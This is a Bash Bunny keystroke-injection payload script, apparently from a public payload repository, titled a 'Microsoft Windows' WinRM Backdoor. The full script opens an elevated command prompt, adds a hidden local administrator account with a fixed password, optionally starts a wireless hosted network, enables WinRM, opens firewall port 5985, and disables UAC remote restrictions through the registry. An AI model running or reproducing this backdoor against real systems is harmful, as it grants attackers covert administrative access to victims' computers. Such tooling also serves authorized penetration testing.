Files
bashbunny-payloads/payloads/library/remote_access/win_winrm-backdoor/payload.txt
TW-D 83c38586b4 Add "Microsoft Windows" WinRM Backdoor (#493)
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
    Avoids security measures on the internal network with the 
    creation of a wireless "Hosted Network".
4) Enables "Windows Remote Management" with default settings.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
7) Hides user account.
2022-02-08 08:23:11 -08:00

143 lines
3.3 KiB
Bash

#!/bin/bash
#
# Title: "Microsoft Windows" WinRM Backdoor
#
# Description:
# 1) Adds a user account.
# 2) Adds this local user to local administrator group.
# 3) If the target computer is equipped with a compatible Wi-Fi card :
# Avoids security measures on the internal network with the
# creation of a wireless "Hosted Network".
# 4) Enables "Windows Remote Management" with default settings.
# 5) Adds a rule to the firewall.
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
# 7) Hides user account.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmode: HID
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrators' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
######## SETUP ########
LED SETUP
ATTACKMODE HID
######## ATTACK ########
LED ATTACK
Q DELAY 2000
Q GUI r
Q DELAY 7000
Q STRING "cmd"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 7000
Q LEFTARROW
Q DELAY 5000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "NET USER ${WINDOWS_USERNAME} ${WINDOWS_PASSWORD} /ADD"
Q ENTER
Q DELAY 1500
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${WINDOWS_USERNAME} /ADD"
Q ENTER
Q DELAY 1500
if [ "${WIRELESS_HOTSPOT}" == "true" ]
then
LED SPECIAL
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${HOTSPOT_NAME} KEY=${WINDOWS_PASSWORD}"
Q ENTER
Q DELAY 5000
Q STRING "NETSH WLAN START HOSTEDNETWORK"
Q ENTER
Q DELAY 5000
fi
LED STAGE3
Q STRING "WINRM QUICKCONFIG"
Q ENTER
Q DELAY 3000
Q STRING "y"
Q ENTER
Q DELAY 1500
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Windows Remote Management for BB\" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
Q ENTER
Q DELAY 1500
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${WINDOWS_USERNAME} /t REG_DWORD /d 0"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
Q STRING "EXIT"
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0